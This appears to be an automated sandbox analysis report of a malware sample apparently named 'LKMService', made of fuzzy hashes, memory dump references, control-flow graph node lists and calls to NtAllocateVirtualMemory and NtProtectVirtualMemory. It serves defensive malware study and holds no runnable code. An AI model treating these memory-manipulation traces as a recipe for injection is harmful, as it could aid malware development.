                  • Opcode Fuzzy Hash: 7c7f3ffc4b34c07dfe6c310f8f2aa48bb0b198fe0436f9db494fe67d5a55f880
                  • Instruction Fuzzy Hash: 82510332B102648FCB28EE6D985156E77F6AFC935075A01BAD909EB392DA74DC02C7D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: *0H
                  • API String ID: 0-334318661
                  • Opcode ID: 60981a07cc82f93fe18c621a4b2e706036f7b406cbda98acf1960514ca61cad5
                  • Instruction ID: 162bc07ae2e26789c3115749b5e9b20100980270a8a555499ea0a73511c2b019
                  • Opcode Fuzzy Hash: 60981a07cc82f93fe18c621a4b2e706036f7b406cbda98acf1960514ca61cad5
                  • Instruction Fuzzy Hash: CE51E773F106388F8B24DE6D8C4419DB6E2BB8866075B41AADD06FB351DA64DD05CBD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: *0H
                  • API String ID: 0-334318661
                  • Opcode ID: debbc4b0b8ecf639bf3705226ba8e4de1db8e2d77391402e13cb8853c724d485
                  • Instruction ID: c22b95ec8e1ebc9da6d87ec36ff1f1a0d19d932982f331adf7a129ac71591d5c
                  • Opcode Fuzzy Hash: debbc4b0b8ecf639bf3705226ba8e4de1db8e2d77391402e13cb8853c724d485
                  • Instruction Fuzzy Hash: 7141C673F20A388B8B24DE6D8C4419DB2E3AB8866075B816ADD06FB751DA64DD05C7D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: "/3N
                  • API String ID: 0-2103554259
                  • Opcode ID: baeee4c4450fdb9001bad7651e3b88d7e6b637a68daabf18d7433876bba8b965
                  • Instruction ID: b924c031b7b8e73636ba3fd6dde53c4461fbc67dc3fc37e0c2308da6d55a6680
                  • Opcode Fuzzy Hash: baeee4c4450fdb9001bad7651e3b88d7e6b637a68daabf18d7433876bba8b965
                  • Instruction Fuzzy Hash: FF41F876F006698FCB18CA5DCC505AEB6B2BF99310B5B416EDD05FB361D6349D008BD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: PV
                  • API String ID: 0-2473318681
                  • Opcode ID: 658bd696b96065ea9ab6cb3a366e6a8769c1fc5fb87129801ba3281832a9a89d
                  • Instruction ID: 06b9ec94ba35ffbeb3822b263f6ece94e858011094918d361e7676968573cf72
                  • Opcode Fuzzy Hash: 658bd696b96065ea9ab6cb3a366e6a8769c1fc5fb87129801ba3281832a9a89d
                  • Instruction Fuzzy Hash: E2419575F402598FCB04CFA9D8819DEBBF5BF89320B5A41AAD805F7361D6349D05CBA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d42e153da92d0475fa5fd5e1cae977af4ad516e197818327a981561b94c6e72c
                  • Instruction ID: 4bd227c1a6f0d135f1bf4e628489a96bdb19fa086d8cb46fbff64870b75a2c23
                  • Opcode Fuzzy Hash: d42e153da92d0475fa5fd5e1cae977af4ad516e197818327a981561b94c6e72c
                  • Instruction Fuzzy Hash: 99F19674B053188FDB24CF69CCC8799B7B2BB89300F1581A9D509EB362EA74AD85CF51
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 45c5a8734744997775da0c2d7dca91ea8a5f92b38ced98bf3effa00d5065fd08
                  • Instruction ID: 726915936bbedaca26176f29a6071a8e3e2f6720e30b76772bf804c834cbc0f8
                  • Opcode Fuzzy Hash: 45c5a8734744997775da0c2d7dca91ea8a5f92b38ced98bf3effa00d5065fd08
                  • Instruction Fuzzy Hash: C9F1E576E10608AFCF0DCFEAE89559DBBB2BF88310B558129E525EB321DB349811CF40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea02fda61f575d3802d7053a1ca18754b2a2c085852029a06da4007a000d53ec
                  • Instruction ID: b763eb6a8b0c38825401d325da0f4cb9d2f00aeac41e088396faa14bf290e1a4
                  • Opcode Fuzzy Hash: ea02fda61f575d3802d7053a1ca18754b2a2c085852029a06da4007a000d53ec
                  • Instruction Fuzzy Hash: 9491F973F201254B9B58EA3D8C9057EA2D79FC865070A816BED09FB384DF249C0297D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09ca6cf3c06b42104267b83d2bdb06aa254d77d79607962f1b32d0d0b17cecb3
                  • Instruction ID: ac48236ae591f350373c7bb56624067166a3da7fc107137d0280c56bc3c38f28
                  • Opcode Fuzzy Hash: 09ca6cf3c06b42104267b83d2bdb06aa254d77d79607962f1b32d0d0b17cecb3
                  • Instruction Fuzzy Hash: 1471F432F002259FC714DF6DD85456FBBA6BFC8320B1A856AE919EB351DA70AC41CBD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2de428b29f7a16efa078832f9b47556db9041b9388482414a25414e87a3f5d78
                  • Instruction ID: edbf44d97fe9db8a441be9c51ce8b869f04d5068a421e5462a2369bddd773362
                  • Opcode Fuzzy Hash: 2de428b29f7a16efa078832f9b47556db9041b9388482414a25414e87a3f5d78
                  • Instruction Fuzzy Hash: 9081A032E002258FCB14EF78C894559B7F2BB9931474A85AAE806EF355EB35EC41CB91
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4348bd1531d82f317229469cf714d778299a513ef51bed2e8aa30b1d1c2d189c
                  • Instruction ID: ff37c8c94a3b361d1a793a32549311bbcd29c5895ab5bcac58c3d72f00858164
                  • Opcode Fuzzy Hash: 4348bd1531d82f317229469cf714d778299a513ef51bed2e8aa30b1d1c2d189c
                  • Instruction Fuzzy Hash: 1071C773E205388B8B18CFADC88549EF7F6AB9C61071B826ADD15FB350DA349D058BD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ada24cae8e0f1442f0339de53d15e0decfea27772e95a1df2a6995417bde39a1
                  • Instruction ID: ea577998280e727d4fbb000e01674cea949b7e874234204add2ee838ac5ae3a4
                  • Opcode Fuzzy Hash: ada24cae8e0f1442f0339de53d15e0decfea27772e95a1df2a6995417bde39a1
                  • Instruction Fuzzy Hash: 1F61C677F205388F8B14CFA9D85549DB7F6AB9821071B826ADC06FB351DA349D058BD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b53c329bd595dcbae60ade3b0c817fec9daeeac38394654442289d42e533d343
                  • Instruction ID: 67e29ea451624eaa988b1210ae9b5991bd7c5ae4d7c2854cb65dbf3c130e13a8
                  • Opcode Fuzzy Hash: b53c329bd595dcbae60ade3b0c817fec9daeeac38394654442289d42e533d343
                  • Instruction Fuzzy Hash: D951D377F115394BDB54DE6D9C402AAB6E36BD821070A82BAE80AFB745E6748C05CBD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aa8617d60b35ecdeb8e5d09d94ca95726d2249073bdc02dfe2d4b4b86c47baa2
                  • Instruction ID: e812d829d4ea627d39ec04a902dd186f8b26f243a6d50b29d88f2f001ca3743d
                  • Opcode Fuzzy Hash: aa8617d60b35ecdeb8e5d09d94ca95726d2249073bdc02dfe2d4b4b86c47baa2
                  • Instruction Fuzzy Hash: 5D51F373F105394B9B54DE6DDC402AEB2E76BD821070A827AEC0AFB745E6748D05CBD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 710cfd2acaeec83ced2d02077443c4e3c881950eb5005c804a7620c03d48129e
                  • Instruction ID: c83f0015faf8c8fc3fbc26b76fe597fc2e2c3b0c5eda48f1c6c634a1edadc214
                  • Opcode Fuzzy Hash: 710cfd2acaeec83ced2d02077443c4e3c881950eb5005c804a7620c03d48129e
                  • Instruction Fuzzy Hash: 6E518D76F101258F8B58DE7DC85496EB7E6BF8931075A407DE909EB7A1DA30EC028B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a881895278f851363637237ef88b1b58311fe2b62c3039befbf238624b33b366
                  • Instruction ID: ab08b1a0c07765a4a54fa55d83874a256bebba14cb59887852bc913538e90973
                  • Opcode Fuzzy Hash: a881895278f851363637237ef88b1b58311fe2b62c3039befbf238624b33b366
                  • Instruction Fuzzy Hash: 3641D233F00220CF9B68AF399C8845977A6AB8531134A44BAEC45EF356DB35EC01DB91
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d74baac1c2b601c5f7f76b44cdaa226b38e0b66b281e2e21620bc1ef5137910
                  • Instruction ID: 3a756e11fa59acf8b3dd51473d1b7e5ea03e5ac565e58beb04c8a33eb1352101
                  • Opcode Fuzzy Hash: 4d74baac1c2b601c5f7f76b44cdaa226b38e0b66b281e2e21620bc1ef5137910
                  • Instruction Fuzzy Hash: 38412777F101384F9B18DEADCC554AEB6F6ABEC21071A416ADD09FB361DA319C018BD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61723b4b66c07faed7ffd67a116e10d31fbc20cd4c8ba1b1b1af5ebba4121b6a
                  • Instruction ID: c149091203230ac714f5250205286edbd2c2870bbfc0fd58d201410e387d2c07
                  • Opcode Fuzzy Hash: 61723b4b66c07faed7ffd67a116e10d31fbc20cd4c8ba1b1b1af5ebba4121b6a
                  • Instruction Fuzzy Hash: 48411976E106198BCB04CFA9D8919DEFBF2BF8C210F164169E914FB365D635AC01CBA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23af5ddec1884985294cfb1bb47bd8c1bf03d85c9e6a6ebe18eab0fe1cbf9aec
                  • Instruction ID: efbd3ab9d0288fa98cef4dd64bb552d8863e5bbe3589a6328fb1114674a2624b
                  • Opcode Fuzzy Hash: 23af5ddec1884985294cfb1bb47bd8c1bf03d85c9e6a6ebe18eab0fe1cbf9aec
                  • Instruction Fuzzy Hash: 70119473F01129479B58DEAE985156BF7E7AFD4350B1AC17AA808EB344DA709D0487D0

                  Execution Graph

                  Execution Coverage:22.3%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:6
                  Total number of Limit Nodes:0
                  execution_graph 14047 49b6230 14048 49b627b NtAllocateVirtualMemory 14047->14048 14050 49b62c2 14048->14050 14051 49b5d50 14052 49b5d9e NtProtectVirtualMemory 14051->14052 14054 49b5de8 14052->14054
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: j'R$&03$9!7J$;.%
                  • API String ID: 0-3501266285
                  • Opcode ID: c14428951cdeada9695e0cfa6cf12fccd3428d105b8c24b6548bd02899a43fa8
                  • Instruction ID: 02d074a521e83c750a44ed2b9dc41320d000acc5736d0101dbe4f30ae33b5cdb
                  • Opcode Fuzzy Hash: c14428951cdeada9695e0cfa6cf12fccd3428d105b8c24b6548bd02899a43fa8
                  • Instruction Fuzzy Hash: 7EE32A75E112698FDB68DF68C880A9DB3B6FB88300F5145E9D809E7351DB35AE81CF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: j'R$&03$9!7J$;.%
                  • API String ID: 0-3501266285
                  • Opcode ID: 1dcf475219467c6637625a1ef06b0a3146215758984faa205b134d55dfb75cf2
                  • Instruction ID: 4f50d7f5cd960a902c5092e35f95080b70d7a872f5d547cf3f210089764c1bc1
                  • Opcode Fuzzy Hash: 1dcf475219467c6637625a1ef06b0a3146215758984faa205b134d55dfb75cf2
                  • Instruction Fuzzy Hash: F0E32A75E112298FDB68DF68C880A9DB3B6FB88300F5145E9D849E7351DB35AE81CF90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2138 9ec3d8-9ec3e2 2139 9ec3e4-9ec3f3 call 9eab78 2138->2139 2142 9ec3f5-9ec409 2139->2142 2144 9ec41b-9ec429 2142->2144 2145 9ec40b-9ec411 2142->2145 2144->2142 2147 9ec42b-9ec45a 2144->2147 2145->2139 2146 9ec413-9ec41a 2145->2146 2151 9ec45b-9ec45d 2147->2151 2152 9ec45f-9ec48f 2151->2152 2153 9ec4d3-9ec4d4 2151->2153 2155 9ec494-9ec4aa 2152->2155 2153->2151 2154 9ec4d5-9ec4d7 2153->2154 2156 9ec4d9-9ec4e1 2154->2156 2157 9ec4f1-9ec501 2154->2157 2161 9ec536-9ec582 2155->2161 2162 9ec4b0 2155->2162 2156->2155 2158 9ec4e3-9ec4ee 2156->2158 2164 9ec524 2157->2164 2165 9ec503-9ec50c 2157->2165 2158->2157 2172 9ec588 2161->2172 2173 9ec7c0-9ec7d4 2161->2173 2166 9ec4b6-9ec4ba 2162->2166 2167 9ec527 2164->2167 2169 9ec50e-9ec511 2165->2169 2170 9ec513-9ec520 2165->2170 2166->2157 2171 9ec4bc-9ec4c2 2166->2171 2273 9ec529 call 9ecc88 2167->2273 2274 9ec529 call 9ecc79 2167->2274 2174 9ec522 2169->2174 2170->2174 2175 9ec58f-9ec5af 2171->2175 2176 9ec4c8-9ec4cb 2171->2176 2172->2175 2179 9ec68e-9ec6ae 2172->2179 2180 9ec72f-9ec74f 2172->2180 2181 9ec6fc-9ec704 2172->2181 2182 9ec77d-9ec791 2172->2182 2183 9ec64a-9ec663 2172->2183 2184 9ec5d9-9ec5fa 2172->2184 2185 9ec6d7-9ec6e3 2172->2185 2186 9ec5b4-9ec5d4 2172->2186 2187 9ec754-9ec778 2172->2187 2188 9ec625-9ec645 2172->2188 2189 9ec6b3-9ec6d2 call 9e99a0 2172->2189 2173->2158 2177 9ec7da-9ec7f9 2173->2177 2174->2167 2194 9ec992-9ec999 2175->2194 2176->2153 2207 9ec7fb-9ec7ff 2177->2207 2208 9ec840-9ec86e 2177->2208 2178 9ec52f-9ec531 2178->2194 2179->2194 2180->2194 2181->2155 2193 9ec70a-9ec72a 2181->2193 2182->2166 2192 9ec797-9ec7bb 2182->2192 2183->2155 2195 9ec669-9ec689 2183->2195 2184->2176 2191 9ec600-9ec620 2184->2191 2216 9ec6eb-9ec6f7 2185->2216 2186->2194 2187->2194 2188->2194 2189->2194 2191->2194 2192->2194 2193->2194 2195->2194 2218 9ec805-9ec80e 2207->2218 2219 9ec801-9ec803 2207->2219 2231 9ec870-9ec874 2208->2231 2232 9ec8c1-9ec8d4 2208->2232 2216->2194 2226 9ec81d-9ec820 2218->2226 2227 9ec810-9ec813 2218->2227 2225 9ec823-9ec83b 2219->2225 2225->2194 2226->2225 2227->2226 2240 9ec886-9ec88f 2231->2240 2241 9ec876-9ec87c 2231->2241 2252 9ec906-9ec91c 2232->2252 2253 9ec8d6-9ec8e2 2232->2253 2248 9ec89e-9ec8a1 2240->2248 2249 9ec891-9ec894 2240->2249 2241->2155 2247 9ec882-9ec884 2241->2247 2251 9ec8a4-9ec8bc 2247->2251 2248->2251 2249->2248 2251->2194 2259 9ec91e-9ec928 2252->2259 2260 9ec97a-9ec990 call 9e8f70 2252->2260 2253->2157 2255 9ec8e8-9ec901 2253->2255 2255->2194 2262 9ec92a-9ec947 2259->2262 2263 9ec949-9ec951 2259->2263 2260->2194 2266 9ec953-9ec978 2262->2266 2263->2266 2266->2194 2273->2178 2274->2178
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: i$t~t
                  • API String ID: 0-3363634073
                  • Opcode ID: a0686ef9156caebd70da48e899d1fee59c9683f7e4efc3781a6e68adcd7baa9d
                  • Instruction ID: 821920138083445be819bbe8d5fad8904f25f53efd9f6b2003044e20766fa9f9
                  • Opcode Fuzzy Hash: a0686ef9156caebd70da48e899d1fee59c9683f7e4efc3781a6e68adcd7baa9d
                  • Instruction Fuzzy Hash: C0E11475B001658FCB1ADB69C85457E77E2BF89300B154869E986EB3A2DF389C02C7D1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2275 9eb7b8-9eb7c6 2276 9eb7c8-9eb7d4 2275->2276 2278 9eb7da 2276->2278 2279 9eb882-9eb88d 2276->2279 2280 9eb7df-9eb7fa 2278->2280 2279->2280 2281 9eb893-9eb8ab 2279->2281 2285 9eb800-9eb802 2280->2285 2281->2276 2284 9eb8b1-9eb8bc 2281->2284 2286 9ebb0e-9ebb23 2284->2286 2287 9eb8c2 2284->2287 2288 9eb849-9eb857 2285->2288 2289 9eb804-9eb811 2285->2289 2320 9ebb56-9ebb6c 2286->2320 2321 9ebb25-9ebb51 2286->2321 2290 9eba7d-9eba88 2287->2290 2291 9eb908-9eb92b 2287->2291 2292 9eb8c9-9eb903 2287->2292 2293 9eb999-9eb9bc 2287->2293 2294 9eb9e9-9eba14 call 9e99a0 2287->2294 2295 9eba19-9eba3c 2287->2295 2296 9ebab6-9ebadd 2287->2296 2297 9eb972-9eb994 2287->2297 2298 9ebae2-9ebb09 2287->2298 2299 9eb930-9eb93c 2287->2299 2300 9eb9c1-9eb9e4 2287->2300 2301 9eba41-9eba4f 2287->2301 2316 9eb859-9eb85f 2288->2316 2317 9eb871-9eb87d 2288->2317 2289->2276 2302 9eb813-9eb834 2289->2302 2290->2276 2303 9eba8e-9ebab1 2290->2303 2347 9ebcb4-9ebcbb 2291->2347 2292->2347 2293->2347 2294->2347 2295->2347 2296->2347 2297->2347 2298->2347 2299->2276 2304 9eb942-9eb96d 2299->2304 2300->2347 2301->2276 2307 9eba55-9eba78 2301->2307 2302->2288 2324 9eb836-9eb83c 2302->2324 2303->2347 2304->2347 2307->2347 2326 9eb863-9eb86f 2316->2326 2327 9eb861 2316->2327 2317->2347 2320->2288 2322 9ebb72-9ebb84 2320->2322 2321->2347 2350 9ebbae-9ebbb6 2322->2350 2351 9ebb86-9ebba9 2322->2351 2324->2280 2333 9eb83e-9eb847 2324->2333 2326->2317 2327->2317 2333->2288 2350->2276 2363 9ebbbc-9ebbce 2350->2363 2351->2347 2369 9ebc06-9ebc2e 2363->2369 2370 9ebbd0-9ebbd8 2363->2370 2375 9ebc89-9ebca3 2369->2375 2376 9ebc30-9ebc5f 2369->2376 2370->2285 2371 9ebbde-9ebc01 2370->2371 2371->2347 2388 9ebca6 call 9ecfb0 2375->2388 2389 9ebca6 call 9ecfa0 2375->2389 2376->2280 2380 9ebc65-9ebc87 2376->2380 2380->2347 2381 9ebca9-9ebcb2 call 9e8f70 2381->2347 2388->2381 2389->2381
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9x=]$t~t
                  • API String ID: 0-3258716098
                  • Opcode ID: e957b449221b29ea57cb9593d5dd7b5ef987d530472d0b671408d705ddcb9b6b
                  • Instruction ID: 7f21fbee4eb47e830159303224c55d655a004c748d401be81d6b29309298060b
                  • Opcode Fuzzy Hash: e957b449221b29ea57cb9593d5dd7b5ef987d530472d0b671408d705ddcb9b6b
                  • Instruction Fuzzy Hash: CED1BF39B101208F8759EB7DC89892E73E6AF8D71031684B9E90ADB361DF78DC01CB91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2390 9e9198-9e91aa 2391 9e91ac-9e9242 2390->2391 2397 9e9267-9e928e 2391->2397 2398 9e9244-9e9247 2391->2398 2402 9e9294-9e929f 2397->2402 2398->2397 2399 9e9249-9e925f 2398->2399 2399->2397 2405 9e92a5-9e92d4 2402->2405 2406 9e9580-9e9587 2402->2406 2408 9e92da-9e92f8 2405->2408 2409 9e9535-9e954c 2405->2409 2406->2391 2407 9e958d-9e9593 2406->2407 2408->2405 2410 9e92fa-9e9333 2408->2410 2409->2405 2411 9e9552-9e9560 2409->2411 2410->2409 2412 9e9339-9e9378 2410->2412 2411->2406 2413 9e9562-9e9578 2411->2413 2412->2409 2414 9e937e-9e938c 2412->2414 2413->2406 2414->2405 2415 9e9392-9e9401 2414->2415 2415->2391 2421 9e9407-9e945d 2415->2421 2424 9e9502-9e9509 2421->2424 2424->2391 2425 9e950f-9e9528 2424->2425 2426 9e952e 2425->2426 2427 9e9462-9e94ad 2425->2427 2426->2409 2428 9e9594-9e95ad 2427->2428 2429 9e94b3-9e94d6 2427->2429 2432 9e95af-9e95cb 2428->2432 2433 9e9623-9e9669 2428->2433 2429->2405 2430 9e94dc-9e94fb 2429->2430 2430->2424 2434 9e95d0-9e95dd 2432->2434 2439 9e966b-9e967f 2433->2439 2440 9e96b7-9e96bd 2433->2440 2435 9e95e3-9e95f4 2434->2435 2436 9e97c0-9e97d1 2434->2436 2438 9e95f7-9e960c 2435->2438 2436->2434 2441 9e97d7-9e97dd 2436->2441 2444 9e9612-9e961e 2438->2444 2445 9e9763-9e976a 2438->2445 2439->2435 2446 9e9685-9e9689 2439->2446 2440->2434 2443 9e96c3-9e96d4 2440->2443 2442 9e97e3-9e97ef 2441->2442 2442->2438 2447 9e97f5-9e9804 2442->2447 2448 9e96d6-9e96f8 2443->2448 2449 9e9744-9e974a 2443->2449 2444->2433 2451 9e9839-9e988b call 9e8fe0 2444->2451 2445->2438 2450 9e9770-9e978f 2445->2450 2452 9e968f-9e96a6 2446->2452 2453 9e979b-9e97a7 2446->2453 2454 9e980c-9e980f 2447->2454 2455 9e9806-9e9808 2447->2455 2448->2449 2456 9e96fa-9e9736 2448->2456 2449->2434 2457 9e9750-9e975d 2449->2457 2450->2444 2458 9e9795 2450->2458 2452->2434 2460 9e96ac-9e96b2 2452->2460 2453->2434 2459 9e97ad-9e97b1 2453->2459 2463 9e9819 2454->2463 2465 9e9811-9e9818 2454->2465 2462 9e980a 2455->2462 2455->2463 2456->2434 2464 9e973c-9e9742 2456->2464 2457->2445 2458->2453 2459->2442 2466 9e97b3-9e97b9 2459->2466 2460->2453 2462->2465 2468 9e981e-9e9832 2463->2468 2464->2453 2466->2468 2469 9e97bb 2466->2469 2468->2451
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: 1O^
                  • API String ID: 0-971112054
                  • Opcode ID: 7e52b8f4767c843d910f9971bbcad7fbe287543326dae7ada99f827488e0b481
                  • Instruction ID: 5eb29704131d3882e007a0fcef1124be3aaf0484e8a8ec6a61fd8e5508883173
                  • Opcode Fuzzy Hash: 7e52b8f4767c843d910f9971bbcad7fbe287543326dae7ada99f827488e0b481
                  • Instruction Fuzzy Hash: 15127A75E002599FCB15DFAAD89069DB7B2BF88310F14C16AE825E7351EB389D45CF80

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2553 49b5d49-49b5de6 NtProtectVirtualMemory 2556 49b5de8-49b5dee 2553->2556 2557 49b5def-49b5e14 2553->2557 2556->2557
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 049B5DD9
                  Memory Dump Source
                  • Source File: 00000002.00000002.4673956517.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_49b0000_LKMService.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 3ae464bd4a0ff7755360cffb076df1c5d55fbeaf33f3be0049ae872eaf828dfa
                  • Instruction ID: 5626b25661a5f20d9ca6dea83e9d484ab7a21070a0e0cb5dd04258c75ed676ca
                  • Opcode Fuzzy Hash: 3ae464bd4a0ff7755360cffb076df1c5d55fbeaf33f3be0049ae872eaf828dfa
                  • Instruction Fuzzy Hash: 332146B1D003499FDB10CFAAD984ADEFBF0FF48310F208429E519A7250C7759900CBA0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2561 49b5d50-49b5de6 NtProtectVirtualMemory 2564 49b5de8-49b5dee 2561->2564 2565 49b5def-49b5e14 2561->2565 2564->2565
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 049B5DD9
                  Memory Dump Source
                  • Source File: 00000002.00000002.4673956517.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_49b0000_LKMService.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 22b9b7186cf77ef8e3a4cc867243c89c2dbe6040cba2a0a03b8661d4653cccc6
